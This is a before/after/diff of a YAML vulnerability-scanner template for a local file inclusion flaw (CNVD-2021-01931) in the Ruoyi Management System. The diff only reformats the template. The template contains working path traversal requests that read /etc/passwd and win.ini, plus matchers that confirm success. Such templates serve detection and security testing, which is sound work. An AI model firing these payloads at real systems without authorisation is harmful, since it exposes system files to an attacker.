high/CNVD-2021-01931.yaml (before)
id: CNVD-2021-01931

info:
  name: Ruoyi Management System - Local File Inclusion
  author: daffainfo,ritikchaddha
  severity: high
  description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.
  reference:
    - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
  tags: ruoyi,lfi,cnvd,cnvd2021
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22

requests:
  - method: GET
    path:
      - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
      - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"

    matchers-condition: or
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"

      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# Enhanced by cs on 06/03/2022

high/CNVD-2021-01931.yaml (after)
id: CNVD-2021-01931

info:
  name: Ruoyi Management System - Local File Inclusion
  author: daffainfo,ritikchaddha
  severity: high
  description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.
  reference:
    - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: ruoyi,lfi,cnvd,cnvd2021

http:
  - method: GET
    path:
      - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
      - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"

    matchers-condition: or
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"

      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# digest: 490a0046304402206eb36477aee26ec18695a3ec1648c797bf897241159d7fab9b8378c537d02b3902203818599485a74911d8fca2e7713c053a9318132a138daeb2628bb2e9923b2aa0:922c64590222798bb761d5b6d8e72950

high/CNVD-2021-01931.yaml (diff)
@@ -7,13 +7,15 @@ info:
   description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.
   reference:
     - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
-  tags: ruoyi,lfi,cnvd,cnvd2021
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 8.6
     cwe-id: CWE-22
+  metadata:
+    max-request: 2
+  tags: ruoyi,lfi,cnvd,cnvd2021
 
-requests:
+http:
   - method: GET
     path:
       - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
@@ -34,4 +36,4 @@ requests:
           - "extensions"
         condition: and
 
-# Enhanced by cs on 06/03/2022
+# digest: 490a0046304402206eb36477aee26ec18695a3ec1648c797bf897241159d7fab9b8378c537d02b3902203818599485a74911d8fca2e7713c053a9318132a138daeb2628bb2e9923b2aa0:922c64590222798bb761d5b6d8e72950
